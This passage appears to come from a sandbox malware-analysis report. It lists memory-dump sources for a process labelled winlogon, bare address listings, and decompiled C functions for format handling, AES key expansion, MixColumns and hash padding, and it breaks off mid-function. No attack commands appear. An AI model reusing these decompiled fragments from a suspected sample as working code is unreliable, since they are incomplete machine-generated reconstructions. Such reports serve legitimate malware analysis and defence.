    0x00d79860
    0x00d79862
    0x00d79865
    0x00d79870
    0x00d79870
    0x00d79876
    0x00d79876
    0x00d79879
    0x00d7987a
    0x00d7987a
    0x00d79870
    0x00d7987e
    0x00d79880
    0x00d79882
    0x00d79884
    0x00d79884
    0x00d79886
    0x00d7988a
    0x00000000
    0x00000000
    0x00d7988c
    0x00d7988c
    0x00d7988f
    0x00d79891
    0x00000000
    0x00000000
    0x00000000
    0x00d79891
    0x00d79884
    0x00d79893
    0x00d7989d
    0x00000000
    0x00000000
    0x00000000
    0x00d795a8
    0x00d79432
    0x00d79432
    0x00d79432
    0x00d79435
    0x00d79438
    0x00d7943b
    0x00d7946c
    0x00d7946e
    0x00d794b9
    0x00d794bb
    0x00d794c2
    0x00d794c9
    0x00d794cc
    0x00d794cf
    0x00d794d5
    0x00d794d5
    0x00d794d6
    0x00d794d9
    0x00d794e0
    0x00d794e9
    0x00d794ee
    0x00d794f1
    0x00d794f6
    0x00d794f9
    0x00d794fb
    0x00d79500
    0x00d79503
    0x00d79506
    0x00d79506
    0x00d79506
    0x00d7950a
    0x00d7950d
    0x00d7950d
    0x00d79512
    0x00d79512
    0x00d7951d
    0x00d79528
    0x00d79528
    0x00d7952b
    0x00d79537
    0x00d7953c
    0x00d79547
    0x00d79549
    0x00d7954b
    0x00d79551
    0x00d79556
    0x00d79558
    0x00d7955e
    0x00d79470
    0x00d7947c
    0x00d7947c
    0x00d7947f
    0x00d7948f
    0x00d79495
    0x00d7949c
    0x00d7949e
    0x00d794a6
    0x00d794a8
    0x00d794aa
    0x00d794af
    0x00d794b2
    0x00d794b8
    0x00d794b8
    0x00d7943d
    0x00d79440
    0x00d79444
    0x00d7944a
    0x00d79459
    0x00d79463
    0x00d7946b
    0x00d7946b
    0x00d7943b
    0x00d79416
    0x00d79419
    0x00d7941f
    0x00d7941f
    0x00d79405
    0x00d7940b
    0x00d7940b

    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D6F6CE, Relevance: 1.5, Strings: 1, Instructions: 214Crypto
    C-Code - Quality: 88%
    			E00D6F6CE(void* __ecx) {
				char _v6;
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t49;
				signed int _t50;
				void* _t51;
				signed char _t54;
				signed char _t56;
				signed int _t57;
				signed int _t58;
				signed char _t67;
				signed char _t69;
				signed char _t71;
				signed char _t80;
				signed char _t82;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed char _t92;
				void* _t95;
				intOrPtr _t100;
				unsigned int _t102;
				signed char _t104;
				void* _t112;
				unsigned int _t113;
				void* _t114;
				signed int _t115;
				signed int* _t116;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t124;
				void* _t125;

				_push(__ecx);
				_t119 = __ecx;
				_t92 = 1;
				_t49 =  *((char*)(__ecx + 0x31));
				_t124 = _t49 - 0x64;
				if(_t124 > 0) {
					__eflags = _t49 - 0x70;
					if(__eflags > 0) {
						_t50 = _t49 - 0x73;
						__eflags = _t50;
						if(_t50 == 0) {
							L9:
							_t51 = E00D6FDC6(_t119);
							L10:
							if(_t51 != 0) {
								__eflags =  *((char*)(_t119 + 0x30));
								if( *((char*)(_t119 + 0x30)) == 0) {
									_t113 =  *(_t119 + 0x20);
									_push(_t114);
									_v8 = 0;
									_t115 = 0;
									_v6 = 0;
									_t54 = _t113 >> 4;
									__eflags = _t92 & _t54;
									if((_t92 & _t54) == 0) {
										L46:
										_t100 =  *((intOrPtr*)(_t119 + 0x31));
										__eflags = _t100 - 0x78;
										if(_t100 == 0x78) {
											L48:
											_t56 = _t113 >> 5;
											__eflags = _t92 & _t56;
											if((_t92 & _t56) != 0) {
												L50:
												__eflags = _t100 - 0x61;
												if(_t100 == 0x61) {
													L53:
													_t57 = 1;
													L54:
													__eflags = _t92;
													if(_t92 != 0) {
														L56:
														 *((char*)(_t121 + _t115 - 4)) = 0x30;
														__eflags = _t100 - 0x58;
														if(_t100 == 0x58) {
															L59:
															_t58 = 1;
															L60:
															__eflags = _t58;
															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
															_t115 = _t115 + 2;
															__eflags = _t115;
															L61:
															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
															__eflags = _t113 & 0x0000000c;
															if((_t113 & 0x0000000c) == 0) {
																E00D6F0D7(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
																_t122 = _t122 + 0x10;
															}
															E00D6FF22(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
															_t102 =  *(_t119 + 0x20);
															_t116 = _t119 + 0x18;
															_t67 = _t102 >> 3;
															__eflags = _t67 & 0x00000001;
															if((_t67 & 0x00000001) != 0) {
																_t104 = _t102 >> 2;
																__eflags = _t104 & 0x00000001;
																if((_t104 & 0x00000001) == 0) {
																	E00D6F0D7(_t119 + 0x448, 0x30, _t95, _t116);
																	_t122 = _t122 + 0x10;
																}
															}
															E00D6FE7B(_t95, _t119, _t116, _t119, 0);
															__eflags =  *_t116;
															if( *_t116 >= 0) {
																_t71 =  *(_t119 + 0x20) >> 2;
																__eflags = _t71 & 0x00000001;
																if((_t71 & 0x00000001) != 0) {
																	E00D6F0D7(_t119 + 0x448, 0x20, _t95, _t116);
																}
															}
															_t69 = 1;
															L70:
															return _t69;
														}
														__eflags = _t100 - 0x41;
														if(_t100 == 0x41) {
															goto L59;
														}
														_t58 = 0;
														goto L60;
													}
													__eflags = _t57;
													if(_t57 == 0) {
														goto L61;
													}
													goto L56;
												}
												__eflags = _t100 - 0x41;
												if(_t100 == 0x41) {
													goto L53;
												}
												_t57 = 0;
												goto L54;
											}
											L49:
											_t92 = 0;
											__eflags = 0;
											goto L50;
										}
										__eflags = _t100 - 0x58;
										if(_t100 != 0x58) {
											goto L49;
										}
										goto L48;
									}
									_t80 = _t113 >> 6;
									__eflags = _t92 & _t80;
									if((_t92 & _t80) == 0) {
										__eflags = _t92 & _t113;
										if((_t92 & _t113) == 0) {
											_t82 = _t113 >> 1;
											__eflags = _t92 & _t82;
											if((_t92 & _t82) == 0) {
												goto L46;
											}
											_v8 = 0x20;
											L45:
											_t115 = _t92;
											goto L46;
										}
										_v8 = 0x2b;
										goto L45;
									}
									_v8 = 0x2d;
									goto L45;
								}
								_t69 = _t92;
								goto L70;
							}
							L11:
							_t69 = 0;
							goto L70;
						}
						_t84 = _t50;
						__eflags = _t84;
						if(__eflags == 0) {
							L28:
							_push(0);
							_push(0xa);
							L29:
							_t51 = E00D6FBD1(_t119, _t114, __eflags);
							goto L10;
						}
						__eflags = _t84 - 3;
						if(__eflags != 0) {
							goto L11;
						}
						_push(0);
						L13:
						_push(0x10);
						goto L29;
					}
					if(__eflags == 0) {
						_t51 = E00D6FDAE(__ecx);
						goto L10;
					}
					__eflags = _t49 - 0x67;
					if(_t49 <= 0x67) {
						L30:
						_t51 = E00D6F9E7(_t92, _t119, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x69;
					if(_t49 == 0x69) {
						L27:
						_t2 = _t119 + 0x20;
						 *_t2 =  *(_t119 + 0x20) | 0x00000010;
						__eflags =  *_t2;
						goto L28;
					}
					__eflags = _t49 - 0x6e;
					if(_t49 == 0x6e) {
						_t51 = E00D6FD1B(__ecx, _t112);
						goto L10;
					}
					__eflags = _t49 - 0x6f;
					if(_t49 != 0x6f) {
						goto L11;
					}
					_t51 = E00D6FD8F(__ecx);
					goto L10;
				}
				if(_t124 == 0) {
					goto L27;
				}
				_t125 = _t49 - 0x58;
				if(_t125 > 0) {
					_t86 = _t49 - 0x5a;
					__eflags = _t86;
					if(_t86 == 0) {
						_t51 = E00D6F984(__ecx);
						goto L10;
					}
					_t87 = _t86 - 7;
					__eflags = _t87;
					if(_t87 == 0) {
						goto L30;
					}
					__eflags = _t87;
					if(__eflags != 0) {
						goto L11;
					}
					L17:
					_t51 = E00D6FB41(_t92, _t119, __eflags, 0);
					goto L10;
				}
				if(_t125 == 0) {
					_push(1);
					goto L13;
				}
				if(_t49 == 0x41) {
					goto L30;
				}
				if(_t49 == 0x43) {
					goto L17;
				}
				if(_t49 <= 0x44) {
					goto L11;
				}
				if(_t49 <= 0x47) {
					goto L30;
				}
				if(_t49 != 0x53) {
					goto L11;
				}
				goto L9;
			}






































    0x00d6f6d3
    0x00d6f6d6
    0x00d6f6da
    0x00d6f6dd
    0x00d6f6e1
    0x00d6f6e4
    0x00d6f752
    0x00d6f755
    0x00d6f7a4
    0x00d6f7a4
    0x00d6f7a7
    0x00d6f714
    0x00d6f716
    0x00d6f71b
    0x00d6f71d
    0x00d6f7c2
    0x00d6f7c6
    0x00d6f7cf
    0x00d6f7d4
    0x00d6f7d5
    0x00d6f7d9
    0x00d6f7db
    0x00d6f7e0
    0x00d6f7e3
    0x00d6f7e5
    0x00d6f80e
    0x00d6f80e
    0x00d6f811
    0x00d6f814
    0x00d6f81b
    0x00d6f81d
    0x00d6f820
    0x00d6f822
    0x00d6f826
    0x00d6f826
    0x00d6f829
    0x00d6f834
    0x00d6f834
    0x00d6f836
    0x00d6f836
    0x00d6f838
    0x00d6f83e
    0x00d6f83e
    0x00d6f843
    0x00d6f846
    0x00d6f851
    0x00d6f851
    0x00d6f853
    0x00d6f853
    0x00d6f85e
    0x00d6f862
    0x00d6f862
    0x00d6f865
    0x00d6f86b
    0x00d6f86d
    0x00d6f870
    0x00d6f880
    0x00d6f885
    0x00d6f885
    0x00d6f89a
    0x00d6f89f
    0x00d6f8a2
    0x00d6f8a7
    0x00d6f8aa
    0x00d6f8ac
    0x00d6f8ae
    0x00d6f8b1
    0x00d6f8b4
    0x00d6f8c1
    0x00d6f8c6
    0x00d6f8c6
    0x00d6f8b4
    0x00d6f8cd
    0x00d6f8d2
    0x00d6f8d5
    0x00d6f8da
    0x00d6f8dd
    0x00d6f8df
    0x00d6f8ec
    0x00d6f8f1
    0x00d6f8df
    0x00d6f8f4
    0x00d6f8f7
    0x00d6f8fc
    0x00d6f8fc
    0x00d6f848
    0x00d6f84b
    0x00000000
    0x00000000
    0x00d6f84d
    0x00000000
    0x00d6f84d
    0x00d6f83a
    0x00d6f83c
    0x00000000
    0x00000000
    0x00000000
    0x00d6f83c
    0x00d6f82b
    0x00d6f82e
    0x00000000
    0x00000000
    0x00d6f830
    0x00000000
    0x00d6f830
    0x00d6f824
    0x00d6f824
    0x00d6f824
    0x00000000
    0x00d6f824
    0x00d6f816
    0x00d6f819
    0x00000000
    0x00000000
    0x00000000
    0x00d6f819
    0x00d6f7e9
    0x00d6f7ec
    0x00d6f7ee
    0x00d6f7f6
    0x00d6f7f8
    0x00d6f802
    0x00d6f804
    0x00d6f806
    0x00000000
    0x00000000
    0x00d6f808
    0x00d6f80c
    0x00d6f80c
    0x00000000
    0x00d6f80c
    0x00d6f7fa
    0x00000000
    0x00d6f7fa
    0x00d6f7f0
    0x00000000
    0x00d6f7f0
    0x00d6f7c8
    0x00000000
    0x00d6f7c8
    0x00d6f723
    0x00d6f723
    0x00000000
    0x00d6f723
    0x00d6f7ae
    0x00d6f7ae
    0x00d6f7b1
    0x00d6f783
    0x00d6f783
    0x00d6f784
    0x00d6f786
    0x00d6f788
    0x00000000
    0x00d6f788
    0x00d6f7b3
    0x00d6f7b6
    0x00000000
    0x00000000
    0x00d6f7bc
    0x00d6f72b
    0x00d6f72b
    0x00000000
    0x00d6f72b
    0x00d6f757
    0x00d6f79a
    0x00000000
    0x00d6f79a
    0x00d6f759
    0x00d6f75c
    0x00d6f78f
    0x00d6f791
    0x00000000
    0x00d6f791
    0x00d6f75e
    0x00d6f761
    0x00d6f77f
    0x00d6f77f
    0x00d6f77f
    0x00d6f77f
    0x00000000
    0x00d6f77f
    0x00d6f763
    0x00d6f766
    0x00d6f778
    0x00000000
    0x00d6f778
    0x00d6f768
    0x00d6f76b
    0x00000000
    0x00000000
    0x00d6f76f
    0x00000000
    0x00d6f76f
    0x00d6f6e6
    0x00000000
    0x00000000
    0x00d6f6ec
    0x00d6f6ef
    0x00d6f72f
    0x00d6f72f
    0x00d6f732
    0x00d6f74b
    0x00000000
    0x00d6f74b
    0x00d6f734
    0x00d6f734
    0x00d6f737
    0x00000000
    0x00000000
    0x00d6f73a
    0x00d6f73d
    0x00000000
    0x00000000
    0x00d6f73f
    0x00d6f742
    0x00000000
    0x00d6f742
    0x00d6f6f1
    0x00d6f72a
    0x00000000
    0x00d6f72a
    0x00d6f6f6
    0x00000000
    0x00000000
    0x00d6f6ff
    0x00000000
    0x00000000
    0x00d6f704
    0x00000000
    0x00000000
    0x00d6f709
    0x00000000
    0x00000000
    0x00d6f712
    0x00000000
    0x00000000
    0x00000000

    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D61110, Relevance: .7, Instructions: 686
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D68EE0, Relevance: .2, Instructions: 220Crypto
    C-Code - Quality: 34%
    			E00D68EE0(void* __ebx, signed char* __ecx, signed int* __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _t86;
				signed int _t112;
				signed int _t124;
				signed int _t126;
				signed int _t185;
				signed int _t221;
				signed int* _t246;
				signed int _t257;
				signed int _t260;

				_t86 =  *0xd88004; // 0x276b9783
				_v8 = _t86 ^ _t257;
				_v68 = 0x1000000;
				_t246 = __edx;
				_v64 = 0x2000000;
				_v60 = 0x4000000;
				_v56 = 0x8000000;
				_v52 = 0x10000000;
				_v48 = 0x20000000;
				 *__edx = ((( *__ecx & 0x000000ff) << 0x00000008 | __ecx[1] & 0x000000ff) << 0x00000008 | __ecx[2] & 0x000000ff) << 0x00000008 | __ecx[3] & 0x000000ff;
				_v44 = 0x40000000;
				_v40 = 0x80000000;
				_v36 = 0x1b000000;
				__edx[1] = (((__ecx[4] & 0x000000ff) << 0x00000008 | __ecx[5] & 0x000000ff) << 0x00000008 | __ecx[6] & 0x000000ff) << 0x00000008 | __ecx[7] & 0x000000ff;
				_v32 = 0x36000000;
				_v28 = 0x6c000000;
				_v24 = 0xd8000000;
				__edx[2] = (((__ecx[8] & 0x000000ff) << 0x00000008 | __ecx[9] & 0x000000ff) << 0x00000008 | __ecx[0xa] & 0x000000ff) << 0x00000008 | __ecx[0xb] & 0x000000ff;
				_v20 = 0xab000000;
				_v16 = 0x4d000000;
				_v12 = 0x9a000000;
				__edx[3] = (((__ecx[0xc] & 0x000000ff) << 0x00000008 | __ecx[0xd] & 0x000000ff) << 0x00000008 | __ecx[0xe] & 0x000000ff) << 0x00000008 | __ecx[0xf] & 0x000000ff;
				__edx[4] = (((__ecx[0x10] & 0x000000ff) << 0x00000008 | __ecx[0x11] & 0x000000ff) << 0x00000008 | __ecx[0x12] & 0x000000ff) << 0x00000008 | __ecx[0x13] & 0x000000ff;
				_t126 = 8;
				__edx[5] = (((__ecx[0x14] & 0x000000ff) << 0x00000008 | __ecx[0x15] & 0x000000ff) << 0x00000008 | __ecx[0x16] & 0x000000ff) << 0x00000008 | __ecx[0x17] & 0x000000ff;
				__edx[6] = (((__ecx[0x18] & 0x000000ff) << 0x00000008 | __ecx[0x19] & 0x000000ff) << 0x00000008 | __ecx[0x1a] & 0x000000ff) << 0x00000008 | __ecx[0x1b] & 0x000000ff;
				__edx[7] = (((__ecx[0x1c] & 0x000000ff) << 0x00000008 | __ecx[0x1d] & 0x000000ff) << 0x00000008 | __ecx[0x1e] & 0x000000ff) << 0x00000008 | __ecx[0x1f] & 0x000000ff;
				do {
					_t112 = _t246[7];
					_t185 = _t126 & 0x80000007;
					if(_t185 < 0) {
						_t185 = (_t185 - 0x00000001 | 0xfffffff8) + 1;
						_t260 = _t185;
					}
					if(_t260 != 0) {
						if(_t185 == 4) {
							_t112 = ( *((_t112 & 0x0000000f) + 0xd85b68 + ((_t112 >> 0x00000004 & 0x0000000f) + (_t112 >> 0x00000004 & 0x0000000f)) * 8) & 0x000000ff) + (((( *((_t112 >> 0x00000018 & 0x0000000f) + 0xd85b68 + ((_t112 >> 0x1c) + (_t112 >> 0x1c)) * 8) & 0x000000ff) << 8) + ( *((_t112 >> 0x00000010 & 0x0000000f) + 0xd85b68 + ((_t112 >> 0x00000014 & 0x0000000f) + (_t112 >> 0x00000014 & 0x0000000f)) * 8) & 0x000000ff) << 8) + ( *((_t112 >> 0x00000008 & 0x0000000f) + 0xd85b68 + ((_t112 >> 0x0000000c & 0x0000000f) + (_t112 >> 0x0000000c & 0x0000000f)) * 8) & 0x000000ff) << 8);
						}
					} else {
						asm("rol eax, 0x8");
						_t124 = (((( *((_t112 >> 0x00000018 & 0x0000000f) + 0xd85b68 + ((_t112 >> 0x1c) + (_t112 >> 0x1c)) * 8) & 0x000000ff) << 8) + ( *((_t112 >> 0x00000010 & 0x0000000f) + 0xd85b68 + ((_t249 >> 0x00000014 & 0x0000000f) + (_t249 >> 0x00000014 & 0x0000000f)) * 8) & 0x000000ff) << 8) + ( *((_t249 >> 0x00000008 & 0x0000000f) + 0xd85b68 + ((_t249 >> 0x0000000c & 0x0000000f) + (_t249 >> 0x0000000c & 0x0000000f)) * 8) & 0x000000ff) << 8) + ( *((_t249 & 0x0000000f) + 0xd85b68 + ((_t249 >> 0x00000004 & 0x0000000f) + (_t249 >> 0x00000004 & 0x0000000f)) * 8) & 0x000000ff);
						_t68 = _t126 - 1; // 0x7
						_t221 = _t68;
						if(_t221 < 0) {
							_t221 = _t221 + 7;
						}
						_t112 = _t124 ^  *(_t257 + (_t221 >> 3) * 4 - 0x40);
					}
					_t126 = _t126 + 1;
					_t246[8] =  *_t246 ^ _t112;
					_t246 =  &(_t246[1]);
				} while (_t126 < 0x3c);
				return E00D6ABE4(_v8 ^ _t257);
			}




























    0x00d68ee6
    0x00d68eed
    0x00d68ef4
    0x00d68efc
    0x00d68efe
    0x00d68f05
    0x00d68f18
    0x00d68f28
    0x00d68f38
    0x00d68f3f
    0x00d68f4e
    0x00d68f5e
    0x00d68f6e
    0x00d68f75
    0x00d68f85
    0x00d68f95
    0x00d68fa5
    0x00d68fac
    0x00d68fbc
    0x00d68fcc
    0x00d68fdc
    0x00d68fe3
    0x00d69005
    0x00d6901e
    0x00d6902c
    0x00d6904e
    0x00d69070
    0x00d69073
    0x00d69073
    0x00d69078
    0x00d6907e
    0x00d69084
    0x00d69084
    0x00d69084
    0x00d69085
    0x00d69115
    0x00d69184
    0x00d69184
    0x00d6908b
    0x00d6908b
    0x00d690fb
    0x00d690fd
    0x00d690fd
    0x00d69104
    0x00d69106
    0x00d69106
    0x00d6910c
    0x00d6910c
    0x00d69188
    0x00d6918b
    0x00d6918e
    0x00d69191
    0x00d691aa

    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D69330, Relevance: .1, Instructions: 144Crypto
    C-Code - Quality: 100%
    			E00D69330(signed char* __ecx) {
				signed char* _v8;
				intOrPtr _v12;
				signed char _t278;
				signed char* _t279;
				signed char* _t281;
				signed char* _t283;
				signed char* _t285;
				signed int _t287;
				signed int _t289;
				signed int _t291;
				signed int _t293;
				intOrPtr _t294;
				signed int _t296;
				signed int _t298;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;

				_v8 = __ecx;
				_t279 = _v8;
				_v12 = ( *__ecx & 0x000000ff) + ( *__ecx & 0x000000ff) * 2 + ( *__ecx & 0x000000ff) + ( *__ecx & 0x000000ff) * 2;
				_t294 = _v12;
				_t301 = (__ecx[4] & 0x000000ff) + (__ecx[4] & 0x000000ff) * 2;
				_t305 = (__ecx[8] & 0x000000ff) + (__ecx[8] & 0x000000ff) * 2;
				_t287 = (__ecx[0xc] & 0x000000ff) + (__ecx[0xc] & 0x000000ff) * 2;
				 *_t279 =  *(0xd8556a + _t287 * 2) & 0x000000ff ^  *(0xd8556c + _t305 * 2) ^  *(0xd8556b + _t301 * 2) ^  *(_t294 + 0xd8556d);
				_t279[4] =  *(0xd8556c + _t287 * 2) & 0x000000ff ^  *(0xd8556b + _t305 * 2) ^  *(0xd8556d + _t301 * 2) ^  *(_t294 + 0xd8556a);
				_t279[8] =  *(0xd8556b + _t287 * 2) & 0x000000ff ^  *(0xd8556d + _t305 * 2) ^  *(0xd8556a + _t301 * 2) ^  *(_t294 + 0xd8556c);
				_t279[0xc] =  *(0xd8556d + _t287 * 2) & 0x000000ff ^  *(0xd8556a + _t305 * 2) ^  *(0xd8556c + _t301 * 2) ^  *(_t294 + 0xd8556b);
				_t302 = (_t279[1] & 0x000000ff) + (_t279[1] & 0x000000ff) * 2;
				_t306 = (_t279[5] & 0x000000ff) + (_t279[5] & 0x000000ff) * 2;
				_t296 = (_t279[9] & 0x000000ff) + (_t279[9] & 0x000000ff) * 2;
				_t281 = _v8;
				_t289 = (_t279[0xd] & 0x000000ff) + (_t279[0xd] & 0x000000ff) * 2;
				 *(_t281 + 1) =  *(0xd8556a + _t289 * 2) & 0x000000ff ^  *(0xd8556c + _t296 * 2) ^  *(0xd8556b + _t306 * 2) ^  *(0xd8556d + _t302 * 2);
				 *(_t281 + 5) =  *(0xd8556c + _t289 * 2) & 0x000000ff ^  *(0xd8556b + _t296 * 2) ^  *(0xd8556d + _t306 * 2) ^  *(0xd8556a + _t302 * 2);
				 *(_t281 + 9) =  *(0xd8556b + _t289 * 2) & 0x000000ff ^  *(0xd8556d + _t296 * 2) ^  *(0xd8556a + _t306 * 2) ^  *(0xd8556c + _t302 * 2);
				 *(_t281 + 0xd) =  *(0xd8556d + _t289 * 2) & 0x000000ff ^  *(0xd8556a + _t296 * 2) ^  *(0xd8556c + _t306 * 2) ^  *(0xd8556b + _t302 * 2);
				_t303 = ( *(_t281 + 2) & 0x000000ff) + ( *(_t281 + 2) & 0x000000ff) * 2;
				_t307 = ( *(_t281 + 6) & 0x000000ff) + ( *(_t281 + 6) & 0x000000ff) * 2;
				_t298 = ( *(_t281 + 0xa) & 0x000000ff) + ( *(_t281 + 0xa) & 0x000000ff) * 2;
				_t291 = ( *(_t281 + 0xe) & 0x000000ff) + ( *(_t281 + 0xe) & 0x000000ff) * 2;
				_t283 = _v8;
				 *(_t283 + 2) =  *(0xd8556a + _t291 * 2) & 0x000000ff ^  *(0xd8556c + _t298 * 2) ^  *(0xd8556b + _t307 * 2) ^  *(0xd8556d + _t303 * 2);
				 *(_t283 + 6) =  *(0xd8556c + _t291 * 2) & 0x000000ff ^  *(0xd8556b + _t298 * 2) ^  *(0xd8556d + _t307 * 2) ^  *(0xd8556a + _t303 * 2);
				 *(_t283 + 0xa) =  *(0xd8556b + _t291 * 2) & 0x000000ff ^  *(0xd8556d + _t298 * 2) ^  *(0xd8556a + _t307 * 2) ^  *(0xd8556c + _t303 * 2);
				 *(_t283 + 0xe) =  *(0xd8556d + _t291 * 2) & 0x000000ff ^  *(0xd8556a + _t298 * 2) ^  *(0xd8556c + _t307 * 2) ^  *(0xd8556b + _t303 * 2);
				_t304 = ( *(_t283 + 3) & 0x000000ff) + ( *(_t283 + 3) & 0x000000ff) * 2;
				_t308 = ( *(_t283 + 7) & 0x000000ff) + ( *(_t283 + 7) & 0x000000ff) * 2;
				_t300 = ( *(_t283 + 0xb) & 0x000000ff) + ( *(_t283 + 0xb) & 0x000000ff) * 2;
				_t285 = _v8;
				_t293 = ( *(_t283 + 0xf) & 0x000000ff) + ( *(_t283 + 0xf) & 0x000000ff) * 2;
				_t285[3] =  *(0xd8556a + _t293 * 2) & 0x000000ff ^  *(0xd8556c + _t300 * 2) ^  *(0xd8556b + _t308 * 2) ^  *(0xd8556d + _t304 * 2);
				_t285[7] =  *(0xd8556c + _t293 * 2) & 0x000000ff ^  *(0xd8556b + _t300 * 2) ^  *(0xd8556d + _t308 * 2) ^  *(0xd8556a + _t304 * 2);
				_t285[0xb] =  *(0xd8556b + _t293 * 2) & 0x000000ff ^  *(0xd8556d + _t300 * 2) ^  *(0xd8556a + _t308 * 2) ^  *(0xd8556c + _t304 * 2);
				_t278 =  *(0xd8556d + _t293 * 2) & 0x000000ff ^  *(0xd8556a + _t300 * 2) ^  *(0xd8556c + _t308 * 2) ^  *(0xd8556b + _t304 * 2);
				_t285[0xf] = _t278;
				return _t278;
			}


























    0x00d6933f
    0x00d69344
    0x00d69347
    0x00d6934e
    0x00d69351
    0x00d69358
    0x00d6935f
    0x00d6937e
    0x00d6939c
    0x00d693bb
    0x00d693dd
    0x00d693ec
    0x00d693f2
    0x00d693f8
    0x00d693fe
    0x00d69401
    0x00d69421
    0x00d69441
    0x00d69461
    0x00d69487
    0x00d69493
    0x00d69499
    0x00d6949f
    0x00d694a5
    0x00d694a8
    0x00d694c8
    0x00d694e8
    0x00d69508
    0x00d6952e
    0x00d6953a
    0x00d69540
    0x00d69546
    0x00d6954c
    0x00d6954f
    0x00d6956f
    0x00d6958f
    0x00d695af
    0x00d695c8
    0x00d695d1
    0x00d695d8

    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D61870, Relevance: .1, Instructions: 129Crypto
    C-Code - Quality: 97%
    			E00D61870(void* __ecx, char* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t77;
				unsigned int _t123;
				int _t125;
				int _t128;
				char* _t130;
				void* _t157;
				void* _t164;
				void* _t165;
				void* _t166;
				void* _t167;
				void* _t168;
				void* _t169;
				void* _t170;

				_t169 = __ecx;
				_t130 = __edx;
				_t77 =  *((intOrPtr*)(__ecx + 0x40));
				 *((char*)(_t77 + __ecx)) = 0x80;
				_t157 = _t77 + 1;
				if(_t77 >= 0x38) {
					if(_t157 < 0x40) {
						_t165 = _t157 + __ecx;
						_t125 = memset(_t165, 0, 0x40 << 2);
						_t166 = _t165 + (0x40 - _t157 >> 2);
						memset(_t166, _t125, 0 << 0);
						_t170 = _t170 + 0x18;
						_t164 = _t166;
					}
					E00D61110(_t130, _t169, _t169, _t164, _t169);
					E00D6D520(_t164, _t169, 0, 0x38);
				} else {
					if(_t157 < 0x38) {
						_t167 = _t157 + __ecx;
						_t128 = memset(_t167, 0, 0x38 << 2);
						_t168 = _t167 + (0x38 - _t157 >> 2);
						memset(_t168, _t128, 0 << 0);
						_t164 = _t168;
					}
				}
				 *(_t169 + 0x48) =  *(_t169 + 0x48) + ( *(_t169 + 0x40) << 3);
				asm("adc dword [esi+0x4c], 0x0");
